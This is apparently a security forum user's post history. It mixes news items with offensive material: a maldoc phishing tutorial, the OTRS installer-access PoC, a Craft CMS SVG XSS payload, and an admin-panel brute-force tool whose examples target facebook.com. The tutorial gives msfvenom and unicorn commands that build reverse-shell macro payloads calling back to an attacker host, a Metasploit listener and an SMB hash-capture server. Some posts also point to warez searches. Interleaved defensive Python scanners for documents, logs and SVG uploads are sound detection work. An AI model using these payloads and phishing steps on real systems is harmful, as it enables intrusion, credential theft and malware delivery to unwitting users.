Fi8sVrs (Active Members): 3206 posts, 87 days won

Everything posted by Fi8sVrs

  1. This is pretty interesting: the prices for Fake News as a Service have come out after some research by Trend Micro. Imagine that you can create a fake celebrity with 300,000 followers for only $2,600. Now we all know this Fake News thing has been going on for a while, and of course, if it's happening, some capitalist genius is going to monetize it and offer it as a professional service. You can read the full 77-page report by Trend here: The Fake News Machine [PDF]. It's insightful to see the types of services that are available, and how they are categorised. Now I've known about social media manipulation for many years (fake likes, followers, YouTube views and so on), but to see this kind of Fake News at scale, as a service, is something new to me. Unfortunately there's no technical solution to thwart this; it's purely about education. If people don't fact check, cross check and verify sources before disseminating them, this whole Fake News situation is just going to get worse and worse. I feel like it had a serious impact on both Brexit and the Trump election, and it's likely to stay very relevant in any large-scale world events, as so many people now base their opinions on what they see online. Sources: Darknet, The Register
  2. There are many ways to run a phishing campaign. The most common of them all is a typical credential harvesting attack, where the attacker sends an email to the target enticing them to click a link to a spoofed website. Running these campaigns is fairly straightforward, and a couple of tools make this very easy to do. The most common of all is likely the Social Engineer Toolkit. SET works great for cloning an existing website and setting up a PHP form to collect credentials. While this technique is very effective, it may also be a good choice to perform phishing attacks with malicious documents.

     Macro Attacks

     The most common maldoc is a malicious Microsoft Word document. Typically these will contain embedded macros which execute a payload when opened. Because of this, modern Windows will usually display two prompts that the user must click through before the payload is executed. Typically they must click “Enable Content” and then subsequently click “Enable Macros”. There are quite a few ways you can generate these. The simplest way is with Metasploit. As documented here, all you need to do is use msfvenom to generate some malicious Visual Basic code like so:

       msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=8080 -e x86/shikata_ga_nai -f vba-exe

     And then paste it into the Visual Basic Editor. Set up a listener in the Metasploit framework and wait for the user to enable macros.

       msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.101; set LPORT 8080; run; exit -y"

     While you can use multiple encoding types, this attack is likely to get caught by anti-virus. You can use other tools besides msfvenom to generate the VBA code required for the macro. You can also use Unicorn by TrustedSec. To generate the payload use:

       python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 macro

     And you can catch the meterpreter shell with the same listener you would use with the msfvenom payload.

     OLE Attack

     If you like PowerShell Empire more than Metasploit, Empire also has a stager for Office macros. Enigma0x3 has a good blog post on how to do this. Also notable is the OLE attack. Instead of using a macro to execute a payload, you can embed a file within the document itself. By changing the icon, you may be able to trick the user into executing a bat file which contains a malicious payload. This attack is also documented in the same blog post. This attack will prompt the user before executing the payload, as seen below:

     AV Bypass

     Because of the success of the macro attack method, AV vendors have been quick to adapt. If AV is causing an issue, there are a few more tools that you can use to avoid detection. LuckyStrike is a tool that was released at DerbyCon 2016. The author has a lengthy blog post on this tool that is well worth the read. LuckyStrike contains a bunch of obfuscation methods to avoid detection and can even go as far as encrypting the payload, ensuring that an AV sandbox will never be able to execute it for dynamic analysis. If Software Restriction Policies or EMET are what is keeping you down, wePWNise might be the tool for you. As MRWLabs explains it on their website, “It collects information through enumeration of relevant parts of the Registry where various policy security settings are stored, and identifies suitable binaries which are safe to inject code into.”

     Capturing Hashes

     Now to get into the more exotic methods. A very novel way of capturing NTLM hashes is with a tool named WordSteal. The way WordSteal works is by embedding a reference to a file hosted on a malicious SMB server. When the document is opened, the client will try to connect to the SMB server without any user interaction. This will capture an NTLM handshake, which can be sent to a password cracker just as you would if you were running Responder within the local network. The biggest caveat here is that the client network must be able to initiate SMB connections outbound. This means that there must not be any egress rule blocking port 445. This is not always the case, but if it goes through this is a good way to collect hashes, as the user does not have to do anything other than open the document. If you are able to crack domain credentials, there is a good chance you can use Microsoft Outlook to execute a payload within the target environment as described in my blog post here: From OSINT to Internal – Gaining Access from outside the perimeter

     This attack requires a malicious SMB server. Fortunately, we can stand this up quite easily by using Metasploit. Just run the following module:

       use auxiliary/server/capture/smb

     And it will output any handshakes that it captures. Metasploit has the option of outputting this data in a format you can send to Cain and Abel or John the Ripper.

     Prompting for credentials

     Phishery is another great tool for non-traditional credential harvesting. Phishery is written in Go, and pre-compiled binaries are available here. The way Phishery works is by using HTTP Basic Authentication delivered over SSL. This tool is very easy to use, although to bypass the warnings to the end user you will need to set up a domain with a proper SSL certificate, or they will see this: After clicking “Yes”, or bypassing it altogether with a valid certificate, the user will receive an authentication prompt. If they enter their credentials, you will see them posted back to the listening server.

     Exploits

     While all these require some level of social engineering, you can also exploit the target with an exploit. Recently CVE-2017-0199 was disclosed by FireEye after it had been found in the wild. This exploit targets RTF files opened with Microsoft Word. MDSec has published a blog post on how to exploit it, and a blogger wrote a step-by-step set of instructions to create a working exploit. If you don't want to do this manually, there is also a toolkit published on GitHub for exploiting this. It can create the RTF file, host the HTA payload, and host an exe that is executed by the HTA file. The only other things you need to make it work are msfvenom and Metasploit, although with some minor modifications it could be used to deliver any other payload as well, such as a PowerShell Empire stager. At the time of this writing, there is a Metasploit module in development for this attack. A pull request has been opened, and will likely be merged into the main branch soon.

     Source: https://www.n00py.io/2017/04/phishing-with-maldocs/
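As an added example, not code from the post above or from any of the tools it names, here is the document-side triage a defender would run on an inbound .docx for the three mechanisms the post describes: a VBA project part (the macro attack), embedded objects under word/embeddings/ (the OLE attack), and relationship targets marked External that point at a UNC path or URL (the WordSteal-style reference that makes Word reach out over SMB). The sample document is built in memory, and the UNC host 10.0.0.5 is a made-up value, so the script runs offline with only the standard library.

```python
"""Static triage of a .docx for macro, embedded-object and external-target artefacts.

Added example (not from the post or from the tools it mentions). Flags:
  * word/vbaProject.bin                      -> VBA macros present
  * word/embeddings/*                        -> embedded (OLE) files
  * *.rels Relationship TargetMode=External  -> target is a UNC path or URL,
    i.e. Word will contact a remote host when the document is rendered.
The sample package and the host 10.0.0.5 below are constructed for this demo.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
# UNC path (\\host\share\...) or an absolute scheme Word will fetch remotely.
REMOTE_TARGET = re.compile(r"^(\\\\|file:|https?:|ftp:)", re.IGNORECASE)


def scan_docx(data: bytes) -> dict:
    """Return findings for a .docx/.docm given as raw bytes."""
    findings = {"has_macros": False, "external_targets": [], "embedded_objects": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            lower = name.lower()
            if lower == "word/vbaproject.bin":
                findings["has_macros"] = True
            elif lower.startswith("word/embeddings/"):
                findings["embedded_objects"].append(name)
            elif lower.endswith(".rels"):
                root = ET.fromstring(zf.read(name))
                for rel in root.iter(REL_NS + "Relationship"):
                    target = rel.get("Target", "")
                    if rel.get("TargetMode") == "External" and REMOTE_TARGET.match(target):
                        findings["external_targets"].append((name, target))
    return findings


def is_suspicious(findings: dict) -> bool:
    return bool(findings["has_macros"] or findings["external_targets"] or findings["embedded_objects"])


def build_sample_docx(image_target: str, with_macro: bool) -> bytes:
    """Constructed minimal package: just enough parts for scan_docx to inspect."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/_rels/document.xml.rels",
                    '<?xml version="1.0"?>'
                    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
                    '<Relationship Id="rId1" TargetMode="External" '
                    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" '
                    f'Target="{image_target}"/></Relationships>')
        if with_macro:
            # Placeholder bytes, not a real OLE/VBA stream: only the part name matters here.
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 constructed placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    doc = build_sample_docx(r"\\10.0.0.5\share\logo.png", with_macro=True)
    print(scan_docx(doc), "suspicious:", is_suspicious(scan_docx(doc)))
```

The relationship check is the one worth keeping in a mail gateway: a macro can be stripped or blocked by policy, but an external image or template target triggers the SMB connection with no prompt at all, so the only chance to catch it is before the document reaches Word.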
  3. https://www.goodreads.com/shelf/show/astrophysics search on torrent/warez
  4. Security researchers found malware using Britney Spears' Instagram account, where the attacker posted a malicious comment. According to the research, the hacking group named Turla is behind the malware; it is a Russian group known for targeting governments and officials. The attackers spread the malware by posting a comment on the Instagram account of the world's most famous singer, Britney Spears. According to ESET, the malware was hidden in a Firefox browser extension. The extension uses a bit.[ly] URL to reach its C&C, but the URL path is nowhere to be found in the extension code. In fact, it will obtain this path by using comments posted on a specific Instagram post. The one that was used in the analyzed sample was a comment about a photo posted to the Britney Spears official Instagram account.

     Technical analysis

     This Firefox extension implements a simple backdoor. It will first gather information on the system it is running on and send it to the C&C, encrypted using AES. This is very similar to what the extension described in the Pacifier APT white paper is doing. The backdoor component has the ability to run four different types of commands:

       * execute arbitrary file
       * upload file to C&C
       * download file from C&C
       * read directory content: send a file listing, along with sizes and dates, to C&C

     While we believe this to be some type of test, the next version of the extension, if there is one, is likely to be very different. There are several APIs that are used by the extension that will disappear in future versions of Firefox. For example, it uses XPCOM to write files to disk and sdk/system/child_process to launch a process. These can only be used by add-ons that will be superseded by WebExtensions starting with Firefox 57. From that version onwards, Firefox will no longer load such add-ons, thus preventing the use of these APIs.

     Conclusion

     The fact that the Turla actors are using social media as a way to obtain their C&C servers is quite interesting. This behavior has already been observed in the past by other threat crews such as the Dukes. Attackers using social media to recover a C&C address are making life harder for defenders. Firstly, it is difficult to distinguish malicious traffic to social media from legitimate traffic. Secondly, it gives the attackers more flexibility when it comes to changing the C&C address as well as erasing all traces of it. It is also interesting to see that they are recycling an old way of fingerprinting a victim and finding new ways to make the C&C retrieval a bit more difficult.

     Via: blog.hackersonlineclub.com
  5. We managed to get a recording of most of the talks during the 10th edition. While the recording quality is not the best, we hope it will benefit people who couldn't attend. For DevOops Redux, the recording quality was unfortunately really bad, but CERN did an awesome one the day before Insomni'hack. Seeing how great theirs was, we would have been ashamed to publish ours, so here's the link to this great talk hosted on CERN's site: https://cds.cern.ch/record/2256987?ln=en And here's the link to the Insomni'hack 2017 YouTube playlist: Source
  6. https://rstforums.com/forum/topic/23949-how-to-make-a-laser-alarm
  7. Due to insufficient checking of privileges, it is possible to access the OTRS Install dialog of an already installed instance, which enables an authenticated attacker to change the database settings, superuser password, mail server settings, log file location and other parameters. Versions affected include OTRS 5.0.x, OTRS 4.0.x, and OTRS 3.3.x

     -----BEGIN PGP SIGNED MESSAGE-----
     Hash: SHA512

     Advisory ID: SYSS-2017-018
     Product: OTRS
     Manufacturer: OTRS
     Affected Version(s): OTRS 5.0.x, OTRS 4.0.x, OTRS 3.3.x
     Fixed Version(s): OTRS 5.0.20, OTRS 4.0.24, OTRS 3.3.17
     Tested Version(s): 5.0.19
     Vulnerability Type: Access to Installation Dialog
     Risk Level: High
     Solution Status: Fixed
     Manufacturer Notification: 2017-05-30
     Solution Date: 2017-06-06
     Public Disclosure: 2017-06-08
     CVE Reference: CVE-2017-9324
     Author of Advisory: Sebastian Auwarter, SySS GmbH

     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Overview:

     OTRS is a ticket management system. The manufacturer describes the product as follows (see [1]):

     "OTRS is one of the most flexible web-based ticketing systems used for Customer Service, Help Desk, IT Service Management. With a fast implementation and easy customization to your needs it helps you reducing costs and increasing the efficiency and transparency of your business communication."

     Due to insufficient checking of privileges, it is possible to access the OTRS Install dialog of an already installed instance, which enables an authenticated attacker to change the database settings, superuser password, mail server settings, log file location and other parameters.

     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Vulnerability Details:

     The recommended way to install OTRS is to use the installation dialog found at http://vulnerablehost/otrs/installer.pl. After successful installation, OTRS prevents further use of this installer.

     Any authenticated user can access the installation functionality of OTRS by referencing the installer via a crafted URL. The URLs that can be used to access the installer can be one of the following:

       * http://vulnerablehost/otrs/index.pl?Action=Installer
       * http://vulnerablehost/otrs/index.pl?Action=Installer;Subaction=Intro
       * http://vulnerablehost/otrs/index.pl?Action=Installer;Subaction=Start
       * http://vulnerablehost/otrs/index.pl?Action=Installer;Subaction=System

     At the end of each "installation" step, the user is redirected to the start page. Therefore, the next step of the installation dialog must be called directly using the Intro, Start (Database) or System subaction, respectively.

     By using the installer tool, an attacker can change a variety of parameters, including the superuser password, database settings, mail server settings, log file location and instance ID.

     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Proof of Concept (PoC):

     On a newly installed instance of OTRS, logged in as any valid user, navigate to index.pl?Action=Installer;Subaction=Start to change the database parameters or to index.pl?Action=Installer;Subaction=System to get a superuser password.

     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Solution:

     This vulnerability is fixed in the latest versions of OTRS, and it is recommended to upgrade to the latest patch level.

     Fixed releases can be found at: https://www.otrs.com/category/release-and-security-notes-en/

     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Disclosure Timeline:

     2017-05-30: Vulnerability discovered
     2017-05-30: Vulnerability reported to manufacturer by project member
     2017-06-06: Vulnerability reported to manufacturer via security advisory
     2017-06-06: Fix provided by manufacturer
     2017-06-06: Vulnerability disclosed by manufacturer
     2017-06-08: Public release of the security advisory

     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     References:

     [1] Product website for OTRS
         https://www.otrs.com/
     [2] SySS Security Advisory SYSS-2017-018
         https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2017-018.txt
     [3] SySS Responsible Disclosure Policy
         https://www.syss.de/en/news/responsible-disclosure-policy/

     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Credits:

     This security vulnerability was found by Sebastian Auwarter of SySS GmbH.

     E-Mail: sebastian-auwaerter@syss.de
     Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Auwaerter.asc
     Key Fingerprint: F98C 3E12 6713 19D9 9E2F BE3E E9A3 0D48 E2F0 A8B6

     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Disclaimer:

     The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site.

     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Copyright:

     Creative Commons - Attribution (by) - Version 3.0
     URL: http://creativecommons.org/licenses/by/3.0/deed.en

     -----BEGIN PGP SIGNATURE-----
     Version: GnuPG v1

     iQIcBAEBCgAGBQJZORr6AAoJEOmjDUji8Ki2Lt0P/iZ6DLr1ezWAhEHLxEdsrmGT
     OTpXaT3ANvvzWf4HH5NsIF/Q+kZAymNsW53MXxLJA0wZCj9t5cKR4UHptgd83W0h
     oNe3yOnYWPMf0L25PqNBy0wWVLLKL2Zme3xhSEYiEmbOCYERjr6IeX5td1i+PwwC
     wOkrYt/98o+XwtkMk25QyrQ0/IypNescPX2wj6zkOHkv0FcZUDsrAyOPFYBEyQ9q
     7VUnNnUZlZK5h8hJZQ63c+5I/Ql5FxqtzPdkiZeYkj3oavaipWTKm2goCFzU8fA1
     V1V5/ohQNd1Rk5sH+0NtC3KIMhbCA2hmH586jyDAgtZg6oRPXrHM4wFZE2SICKWy
     HeXIc1HUs6cvPFkFaxTNFL3Grb5NBuDBGxgwC7IQQ23pR3vYU3ckXC7UOj69sYSS
     bvGtcleYU17J7ND3YgQeVzMr58S/9i/mhZ/ya4WIGCp+9zh4YZiKzGK0PqFON+nn
     OQrQBLTwwTZz/VJJyWeaNWc7m4R4BXwi/BeYlAV3t51srWwCUV23NxDEXjKu4TZ7
     0f93N0qYcSpVi0CIwPtA5IDTVNhOWSLzeco1zitJvDq5V9l4gbyAISXOFV12RxSh
     cduM6hUc6ALp1UziHQRpD8xUhFbF03WVysN5wHXrM9+d+TaVZ92KOaCv6VIWDVBh
     63bQpoUQZ8L4LfzusTTl
     =EuyE
     -----END PGP SIGNATURE-----

     Source
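As an added example, not part of the SySS advisory, here is the detection a defender can run against web server access logs to find out whether the installer dialog was reached on an already-installed instance. It assumes the Apache/nginx "combined" log format in front of OTRS; the log lines below are constructed. The parser accepts both the ';' separator OTRS uses and '&', and URL-decodes the parameters, so `Action=%49nstaller` is still caught. On a patched instance these requests should not be served with 200; on the affected versions a 200 to Subaction=Start or Subaction=System from an ordinary user session is the signature of the advisory.

```python
"""Find requests to the OTRS installer in combined-format access logs.

Added example, not part of the advisory. Assumes Apache/nginx combined log
lines; the sample lines are constructed for this demo.
"""
import re
from urllib.parse import unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample: one normal request, three installer requests, one blocked installer.pl hit.
SAMPLE_LOG = [
    '10.1.2.3 - - [08/Jun/2017:10:00:01 +0000] "GET /otrs/index.pl?Action=AgentDashboard HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.1.2.3 - - [08/Jun/2017:10:00:05 +0000] "GET /otrs/index.pl?Action=Installer;Subaction=Start HTTP/1.1" 200 3044 "-" "Mozilla/5.0"',
    '10.1.2.3 - - [08/Jun/2017:10:00:09 +0000] "POST /otrs/index.pl?Action=Installer;Subaction=System HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '10.1.2.7 - - [08/Jun/2017:10:01:00 +0000] "GET /otrs/index.pl?Action=%49nstaller&Subaction=Intro HTTP/1.1" 200 3044 "-" "curl/7.52.1"',
    '10.1.2.9 - - [08/Jun/2017:10:02:00 +0000] "GET /otrs/installer.pl HTTP/1.1" 403 199 "-" "curl/7.52.1"',
]


def parse_query(query: str) -> dict:
    """OTRS accepts ';' as well as '&' between parameters; decode both, keys lower-cased."""
    params = {}
    for pair in re.split(r"[;&]", query):
        if "=" in pair:
            key, value = pair.split("=", 1)
            params[unquote(key).lower()] = unquote(value)
    return params


def find_installer_access(lines):
    """Every request to installer.pl or to index.pl with Action=Installer (any casing/encoding)."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a combined-format line; skip rather than guess
        url = urlsplit(m.group("url"))
        params = parse_query(url.query)
        if url.path.lower().endswith("/installer.pl") or params.get("action", "").lower() == "installer":
            hits.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "subaction": params.get("subaction", ""),
                "status": int(m.group("status")),
            })
    return hits


def served_installer_access(lines):
    """Only the installer requests the application actually answered with 200."""
    return [h for h in find_installer_access(lines) if h["status"] == 200]


if __name__ == "__main__":
    for hit in find_installer_access(SAMPLE_LOG):
        print(hit)
```

Redirects (302) after a POST are expected even on a fixed instance, since the advisory notes that each step redirects to the start page; the 200 responses to the Start and System subactions are what should not occur after installation.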
  8. # Exploit Title: Craft CMS 2.6 - Cross-Site Scripting/Unrestricted File Upload
     # Date: 2017-06-08
     # Exploit Author: Ahsan Tahir
     # Vendor Homepage: https://craftcms.com
     # Software Link: http://download.craftcdn.com/craft/2.6/2.6.2981/Craft-2.6.2981.zip
     # Version: 2.6
     # Tested on: [Kali Linux 2.0 | Windows 8.1]
     # Email: mrahsan1337@gmail.com
     # Contact: https://twitter.com/AhsanTahirAT

     Release Date:
     =============
     2017-06-08

     Product & Service Introduction:
     ===============================
     Craft is a content-first CMS that aims to make life enjoyable for developers and content managers alike.

     Abstract Advisory Information:
     ==============================
     Ahsan Tahir, an independent security researcher, discovered a persistent cross-site scripting vulnerability via unrestricted upload of an SVG file in Craft CMS (v2.6).

     Vulnerability Disclosure Timeline:
     ==================================
     2017-06-08: Found the vulnerability.
     2017-06-08: Reported to vendor.
     2017-06-08: Published.

     Discovery Status:
     =================
     Published

     Exploitation Technique:
     =======================
     Remote

     Severity Level:
     ===============
     Medium

     Technical Details & Description:
     ================================
     The security risk of the XSS vulnerability is estimated as medium with a Common Vulnerability Scoring System count of 3.6. Exploitation of the persistent XSS web vulnerability requires a limited editor user account with low privileges (only editing news) and only low user interaction.

     If the attacker uploads any file that can be used for XSS (HTML, SWF, PHP etc.), it will not be accepted as an image. But for images it stays the same. So if the attacker uploads an SVG with JS content, it will work fine and execute the JS! The "Content-Type: image/svg+xml; charset=us-ascii" header will make this XSS attack work.

     Successful exploitation of the XSS vulnerability results in persistent phishing attacks, session hijacking, persistent external redirects to malicious sources and persistent manipulation of the affected or connected web module context.

     Proof of Concept (PoC):
     =======================
     The persistent input validation vulnerability can be exploited by a low-privileged user/editor with privileges only for editing news. After successful exploitation, this attack can be used by the editor to hijack the admin account! For security demonstration or to reproduce the vulnerability, follow the provided information and steps below to continue.

     Payload (Exploitation):

       <?xml version="1.0" standalone="no"?>
       <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
       <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
       <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
       <script type="text/javascript">
       alert(document.domain);
       </script>
       </svg>

     [+] Manual steps to reproduce ..
     1. Login with the editor account (only privilege to edit news) in Craft CMS
     2. Go to 'add news' option: https://localhost/admin/entries/news/new
     3. Put random values in title
     4. On your attacker machine, create a file named 'xss.svg' (without quotes) and inject the payload above into the file
     5. Upload the xss.svg file in the featured image option in Craft CMS
     6. Click on Save
     7. Now go to: https://localhost/s/assets/site/xss.svg
     8. XSS payload execution occurs and an alert pops up with the domain name

     Credits & Authors:
     ==================
     Ahsan Tahir - [https://twitter.com/AhsanTahirAT]

     Source
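As an added example, not code from Craft CMS or from the advisory above, here is the server-side check an upload handler needs when it wants to accept SVG as an image: the advisory's point is that an image-type check passes SVG through, while SVG is XML and can carry script. The validator parses the file and rejects the active content a browser would execute when the file is opened directly (script and foreignObject elements, on* event attributes, javascript:/vbscript: and non-image data: URLs, entity declarations), and a second function returns the response headers to serve user uploads with so that even an SVG that slips through is not rendered in the site's origin. The advisory's payload is embedded for the check; the other samples are constructed.

```python
"""Validate an uploaded SVG before accepting it as an image.

Added example, not code from Craft CMS or the advisory. The advisory payload
is reproduced for the check; the other inputs are constructed.
"""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_HREF = "{http://www.w3.org/1999/xlink}href"
BLOCKED_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object", "use", "set", "animate", "handler"}
# javascript:/vbscript: anywhere, and data: unless it is a raster image.
ACTIVE_SCHEME = re.compile(r"^\s*(?:javascript|vbscript):|^\s*data:(?!image/(?:png|jpe?g|gif|webp))", re.IGNORECASE)

ADVISORY_PAYLOAD = b'''<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>'''


def svg_findings(data: bytes) -> list:
    """Return the reasons to reject the file; an empty list means it passed."""
    findings = []
    if re.search(rb"<!ENTITY", data, re.IGNORECASE):
        findings.append("entity declarations in DTD")
    try:
        root = ET.fromstring(data)          # stdlib parser: does not fetch external DTDs/entities
    except ET.ParseError as exc:
        return ["not well-formed XML: %s" % exc]
    if root.tag != "{%s}svg" % SVG_NS:
        findings.append("root element is not svg")
    for el in root.iter():
        if not isinstance(el.tag, str):
            continue                        # comments / processing instructions
        local = el.tag.rsplit("}", 1)[-1]
        if local in BLOCKED_ELEMENTS:
            findings.append("blocked element <%s>" % local)
        for attr, value in el.attrib.items():
            name = attr.rsplit("}", 1)[-1]
            if name.lower().startswith("on"):
                findings.append("event handler %s on <%s>" % (name, local))
            if attr in ("href", XLINK_HREF) and ACTIVE_SCHEME.match(value):
                findings.append("active URL scheme in %s on <%s>" % (name, local))
        if local == "style" and re.search(r"(@import|url\s*\()", el.text or "", re.IGNORECASE):
            findings.append("style element loads external resources")
    return findings


def is_safe_svg(data: bytes) -> bool:
    return not svg_findings(data)


def upload_response_headers() -> dict:
    """Headers for serving user-supplied files: force download, forbid sniffing, sandbox rendering."""
    return {
        "Content-Type": "image/svg+xml",
        "Content-Disposition": "attachment",
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'; sandbox",
    }


if __name__ == "__main__":
    print(svg_findings(ADVISORY_PAYLOAD))   # the advisory payload is rejected for its <script>
```

Rejecting on upload and serving with `Content-Disposition: attachment` plus a sandboxing CSP are independent layers; the headers alone would already have stopped the advisory's step 7 from executing in the application's origin, and a strict allow-list of elements is the better long-term choice than the block-list shown here.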
  9. It's time to update your Raspberry Pi devices or risk them being infected with cryptocurrency mining malware.

     [Image caption: Older Raspberry Pi devices, such as this Raspberry Pi 2, may be more vulnerable to the malware if they haven't been updated in a while. Image: Raspberry Pi Foundation]

     Someone has developed a simple Linux trojan designed to harness the meager power of Raspberry Pi devices to mine cryptocurrency. Raspberry Pi users may need to consider applying a recent Raspbian OS update to their devices, particularly if they are currently configured to allow external SSH connections.

     According to Russian security firm Dr Web, the malware Linux.MulDrop.14 exclusively targets Raspberry Pi devices to use their processing power to mine a cryptocurrency. Dr Web discovered the Raspberry Pi mining malware after its Linux honeypot machine became infected with it. The malware uses a simple Bash script to attempt to connect to Raspberry Pi devices configured to accept external SSH connections. It targets Raspberry Pi boards with the default login and password, which are 'pi' and 'raspberry', respectively. It then changes 'pi' to '$6$U1Nu9qCp$FhPuo8s5PsQlH6lwUdTwFcAUPNzmr0pWCdNJj.p6l4Mzi8S867YLmc7BspmEH95POvxPQ3PzP029yT1L3yi6K1'. From there it installs the internet-scanning tool ZMap and the sshpass utility, and searches the network for other devices with an open port 22 to infect them.

     Older Raspberry Pi devices may be more vulnerable to this malware if they haven't been updated in a while. The Raspberry Pi Foundation told ZDNet sister site TechRepublic that a Raspbian OS update released late last year turned off SSH by default and forced users to change the default password. However, it warned that there could still be millions of Raspberry Pi boards that haven't been updated. Some 12.5 million of the single-board computers have been sold over the past five years, according to the official Raspberry Pi Magazine.

     The malware doesn't try to mine for Bitcoin, whose 'difficulty level' is too high to mine cost-effectively, even for a massive network of PCs, let alone Raspberry Pi devices. However, there are numerous other cryptocurrencies that can be mined with less computational power. In 2014, malware writers experimented with Android malware to mine Dogecoins and Litecoins. Dr Web's virus analysts said the Raspberry Pi malware mines Monero, a lesser-known but increasingly popular cryptocurrency for dark-web drug markets. Researchers in May discovered that a network of several hundred thousand PCs infected with the Adylkuzz mining malware, which used the same Windows exploit behind the WannaCry ransomware epidemic, had been toiling away on Monero blocks. At the time, Adylkuzz had generated about $43,000 over several months of mining activity.

     Via: zdnet.com
  10. ^ the fees, I think, shipping costs etc... @Shadow86 www.comenziuk.net are trustworthy, $10 per product
  11. send me the link too, if it's still valid
  12. Cangibrina - Beta v0.8.7 - Dashboard Finder

      Cangibrina is a multi-platform tool which aims to obtain the dashboard of sites using brute-force over a wordlist, Google, nmap, and robots.txt

      Requirements:
        Python 2.7
        mechanize
        PySocks
        beautifulsoup4
        html5lib
        Nmap (--nmap)
        TOR (--tor)

      Install (Linux):
        git clone http://github.com/fnk0c/cangibrina.git
        cd cangibrina
        pip install -r requirements.txt

      Usage:
        usage: cangibrina.py [-h] -u U [-w W] [-t T] [-v] [--ext EXT] [--user-agent] [--tor] [--search] [--dork DORK] [--nmap [NMAP]]

        Fast and powerful admin finder

        optional arguments:
          -h, --help     show this help message and exit
          -u U           target site
          -w W           set wordlist (default: wl_medium)
          -t T           set threads number (default: 5)
          -v             enable verbose
          --ext EXT      filter path by target extension
          --user-agent   modify user-agent
          --tor          set TOR proxy
          --search       use google and duckduckgo to search
          --dork DORK    set custom dork
          --nmap [NMAP]  use nmap to scan ports and services

      Examples:
        python cangibrina.py -u facebook.com
        python cangibrina.py -u facebook.com -v
        python cangibrina.py -u facebook.com -w /root/diretorios.txt -t 10 -v
        python cangibrina.py -u facebook.com --search -v
        python cangibrina.py -u facebook.com --search --dork 'site:facebook.com inurl:login'
        python cangibrina.py -u facebook.com -v --nmap
        python cangibrina.py -u facebook.com -v --nmap 'sudo nmap -D 127.0.0.1 -F facebook.com'
        python cangibrina.py -u facebook.com --user-agent
        python cangibrina.py -u facebook.com --ext php

      [IMPORTANT] THE DORK MUST BE WRITTEN BETWEEN QUOTES! [Example] 'inurl:login.php'

      Source: https://github.com/fnk0c/cangibrina
